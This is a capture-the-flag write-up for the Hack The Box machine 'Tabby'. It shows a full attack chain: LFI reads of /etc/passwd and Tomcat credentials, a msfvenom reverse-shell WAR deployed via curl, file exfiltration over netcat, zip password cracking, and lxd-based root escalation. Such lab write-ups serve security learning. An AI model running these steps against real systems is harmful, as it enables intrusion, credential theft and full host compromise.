Previous Page
Tabby Writeup
Introduction :
Tabby is an easy Linux box released back in June 2020.
Tabby is an easy Linux box released back in June 2020.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB]
→ nmap -vvv -p- 10.10.10.194 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 80/tcp on 10.10.10.194
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ nmap -sCV -p 22,8080,80 10.10.10.194
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 07:52 CEST
Nmap scan report for 10.10.10.194
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
Our nmap scan picked up port 80:
So here we found a domain name and a hyperlink leading to megahosting.htb so let's add it to our hosts file:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.194 megahosting.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# exit
And when we click the hyperlink to the data breach we get the following:
Here we see that this is a php file with the file parameter and let's try to see if there is any LFI by trying to read system files such as /etc/passwd:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ curl http://megahosting.htb/news.php\?file\=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
Here we see that the file php arguement is vulnerable to LFI, and we now know that ash is a valid user on this box. Now let's move over to port 8080 with tomcat:
Here we have a tomcat9 instance, let's scan for hidden directories there with ffuf:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ ffuf -u http://10.10.10.194:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://10.10.10.194:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401
________________________________________________
docs [Status: 302, Size: 0, Words: 1, Lines: 1]
examples [Status: 302, Size: 0, Words: 1, Lines: 1]
host-manager [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 1895, Words: 201, Lines: 30]
manager [Status: 302, Size: 0, Words: 1, Lines: 1]
:: Progress: [4686/4686] :: Job [1/1] :: 1211 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
And here we found the manager page with the 302 status code, so we need to authenticate there:
Now obviously putting in admin/admin doesn't get us in, however when we close it to get the 401 Unauthorized error code we get something interesting:
Here we see the original credentials tomcat:s3cret, however they got changed obviously, so instead we shift our attention to the fact that the credentials are stored in the conf/tomcat-users.xml file, so let's use the LFI to get it:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/conf/tomcat-users.xml
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
And here we found credentials for tomcat: tomcat:$3cureP4s5w0rd123!
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ ffuf -u http://10.10.10.194:8080/manager/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive
________________________________________________
:: Method : GET
:: URL : http://10.10.10.194:8080/manager/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401
________________________________________________
html [Status: 401, Size: 2499, Words: 457, Lines: 64]
images [Status: 302, Size: 0, Words: 1, Lines: 1]
status [Status: 401, Size: 2499, Words: 457, Lines: 64]
text [Status: 401, Size: 2499, Words: 457, Lines: 64]
Here we get the /manager/text URI and if we lookup the tomcat documentation, this is where the sysadmin can execute commands, so let's investigate it, and we can do that from curl:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:0:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
So from here, just like for the Kotarak box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ msfvenom -l payloads | grep java\
pipe>
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ msfvenom -l payloads | grep java
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f war > thanksippsec.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ file thanksippsec.war
thanksippsec.war: Zip archive data, at least v2.0 to extract
Now that we created our war file, let's upload it and deploy it:
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ nc -lvnp 9001
listening on [any] 9001 ...
Now the trick here is that unlike on the Kotarak box, here we only have access to the commandline's /manager/text so we're going to upload our war file and deploy it through the commandline thanks to curl:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/deploy\?path\=/webshell\&update\=true -T thanksippsec.war
OK - Deployed application at context path [/webshell]
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/webshell/
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 34800
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
And we got a reverse shell connection! We are now able to execute commands as the tomcat user. Let's first upgrade our shell to a fully interactive TTY:
# check which commands we can use
which python python3 curl wget bash
/usr/bin/python3
/usr/bin/curl
/usr/bin/wget
/usr/bin/bash
# spawn a TTY with python3's pty module
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$
# CTRL Z to background the reverse shell netcat process
tomcat@tabby:/var/lib/tomcat9$ ^Z
[1] + 22233 suspended nc -lvnp 9001
# set the stty as raw with the -echo flags, then foreground the process
[ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
→ stty raw -echo ; fg
[1] + 22233 continued nc -lvnp 9001
# export the TERM and SHELL environment variables, and set the TTY right (for nano /vim stuff)
export TERM=screen-256color
tomcat@tabby:/var/lib/tomcat9$ export SHELL=bash
tomcat@tabby:/var/lib/tomcat9$ stty rows 40 columns 200
tomcat@tabby:/var/lib/tomcat9$ reset
# and once the terminal has resetted, we are now in a fully interactive reverse shell!
tomcat@tabby:/var/lib/tomcat9$ id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
Now from here we can upload linpeas.sh to enumerate the box:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ locate linpeas.sh
/home/nothing/HTB/Admirer/linpeas.sh
/home/nothing/HTB/OpenAdmin/linpeas.sh
/home/nothing/HTB/Postman/linpeas.sh
/home/nothing/HTB/Traverxec/linpeas.sh
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
tomcat@tabby:/var/lib/tomcat9$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
--2021-06-02 08:01:09-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘/tmp/peas.sh’
/tmp/peas.sh 100%[=============================================================================================================>] 333.85K 699KB/s in 0.5s
2021-06-02 08:01:10 (699 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
tomcat@tabby:/var/lib/tomcat9$ chmod +x /tmp/peas.sh
tomcat@tabby:/var/lib/tomcat9$ /tmp/peas.sh
Let linpeas.sh run, then as you scroll down you will end up on a certain backup zip file:
Coincidentally, it seems that the backup zip file is owned by the ash user, and there seems to be a copy of it in the /tmp folder, let's check if they are the same:
tomcat@tabby:/var/lib/tomcat9$ md5sum /var/www/html/files/16162020_backup.zip /tmp/16162020_backup.zip
f0a0af346ad4495cfdb01bd5173b0a52 /var/www/html/files/16162020_backup.zip
f0a0af346ad4495cfdb01bd5173b0a52 /tmp/16162020_backup.zip
And indeed they are the same! let's open it locally and see what it contains, we can use netcat to get the zipfile from the box:
tomcat@tabby:/tmp$ md5sum 16162020_backup.zip
f0a0af346ad4495cfdb01bd5173b0a52 16162020_backup.zip
tomcat@tabby:/var/lib/tomcat9$ which nc
/usr/bin/nc
tomcat@tabby:/tmp$ cat 16162020_backup.zip | nc 10.10.14.13 9002
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ nc -lvnp 9002 > backup.zip
listening on [any] 9002 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 57326
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ md5sum backup.zip
f0a0af346ad4495cfdb01bd5173b0a52 backup.zip
And here we see that the 2 files hashes are identical, this means that we successfully transfered the file back onto our local machine. Let's try to unzip it:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ unzip backup.zip
Archive: backup.zip
creating: var/www/html/assets/
[backup.zip] var/www/html/favicon.ico password:
password incorrect--reenter:
password incorrect--reenter:
skipping: var/www/html/favicon.ico incorrect password
creating: var/www/html/files/
[backup.zip] var/www/html/index.php password:
But it's password protected, so let's try to crack it using fcrackzip:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ sudo apt install fcrackzip
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ fcrackzip -vuDp /usr/share/wordlists/rockyou.txt backup.zip
'var/www/html/assets/' is not encrypted, skipping
found file 'var/www/html/favicon.ico', (size cp/uc 338/ 766, flags 9, chk 7db5)
'var/www/html/files/' is not encrypted, skipping
found file 'var/www/html/index.php', (size cp/uc 3255/ 14793, flags 9, chk 5935)
found file 'var/www/html/logo.png', (size cp/uc 2906/ 2894, flags 9, chk 5d46)
found file 'var/www/html/news.php', (size cp/uc 114/ 123, flags 9, chk 5a7a)
found file 'var/www/html/Readme.txt', (size cp/uc 805/ 1574, flags 9, chk 6a8b)
checking pw arizon1
PASSWORD FOUND!!!!: pw == admin@it
And we found the password! so let's unzip it:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ unzip backup.zip
Archive: backup.zip
[backup.zip] var/www/html/favicon.ico password:
inflating: var/www/html/favicon.ico
inflating: var/www/html/index.php
extracting: var/www/html/logo.png
inflating: var/www/html/news.php
inflating: var/www/html/Readme.txt
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ tree var
var
└── www
└── html
├── assets
├── favicon.ico
├── files
├── index.php
├── logo.png
├── news.php
└── Readme.txt
4 directories, 5 files
The files that were contained are preety much irrelevant, the fact of the matter is that this zip file is supposed to be owned by ash, and we got his potential password. Let's try and see if ash re-used the same password on the box:
tomcat@tabby:/tmp$ su ash
Password:
ash@tabby:/tmp$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:/tmp$ cat ~/user.txt
04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the ash user, and got the user flag.
Now in order to privesc we can run linpeas once again:
ash@tabby:/tmp$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas2.sh
--2021-06-02 08:19:11-- http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘/tmp/peas2.sh’
/tmp/peas2.sh 100%[=============================================================================================================>] 333.85K 689KB/s in 0.5s
2021-06-02 08:19:12 (689 KB/s) - ‘/tmp/peas2.sh’ saved [341863/341863]
ash@tabby:/tmp$ chmod +x /tmp/peas2.sh
ash@tabby:/tmp$ /tmp/peas2.sh
The difference being that now linpeas is going to try and find the possible paths from the ash user:
Now here we see that the ash user is part of the lxd group, which can be exploited to get a root shell thanks to a lxd-alpine container:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 35, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 35 (delta 2), reused 2 (delta 0), pack-reused 27
Receiving objects: 100% (35/35), 21.69 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (8/8), done.
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
→ cd lxd-alpine-builder
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
→ sudo ./build-alpine
[...]
Executing busybox-initscripts-3.2-r2.post-install
(16/20) Installing scanelf (1.2.8-r0)
(17/20) Installing musl-utils (1.2.2-r0)
(18/20) Installing libc-utils (0.7.2-r3)
(19/20) Installing alpine-keys (2.2-r0)
(20/20) Installing alpine-base (3.13.5-r0)
Executing busybox-1.32.1-r6.trigger
OK: 9 MiB in 20 packages
Now let's transfer the built tar.gz image onto the box:
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
→ ls -lash alpine-v3.13-x86_64-20210602_1002.tar.gz
3.2M -rw-r--r-- 1 root root 3.2M Jun 2 10:02 alpine-v3.13-x86_64-20210602_1002.tar.gz
[ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
ash@tabby:/tmp$ wget http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
--2021-06-02 08:24:46-- http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3256211 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’
alpine-v3.13-x86_64-20210602_1002.tar.gz 100%[=============================================================================================================>] 3.10M 570KB/s in 5.5s
2021-06-02 08:24:51 (582 KB/s) - ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’ saved [3256211/3256211]
Say no to all prompts:
ash@tabby:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: no
Would you like to connect to a MAAS server? (yes/no) [default=no]: no
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: no
Would you like LXD to be available over the network? (yes/no) [default=no]: no
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: no
ash@tabby:/tmp$ mv alpine-v3.13-x86_64-20210602_1002.tar.gz alpine.tar.gz
ash@tabby:/tmp$ lxc image import /tmp/alpine.tar.gz --alias alpine
ash@tabby:/tmp$ lxc image list
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| alpine | 2d59dc1f8e1c | no | Alpinelinux 3.8 x86_64 (20210601_2225) | x86_64 | CONTAINER | 1.92MB | Jun 1, 2021 at 10:54pm (UTC) |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
And once your alpine image got imported, we can launch it to get access to the root files on the server:
ash@tabby:/tmp$ lxc init alpine mycontainer -c security.privileged=true
Creating mycontainer
The instance you are starting doesn't have any network attached to it.
To create a new network, use: lxc network create
To attach a network to an instance, use: lxc network attach
ash@tabby:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
ash@tabby:/tmp$ lxc start mycontainer
ash@tabby:/tmp$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :
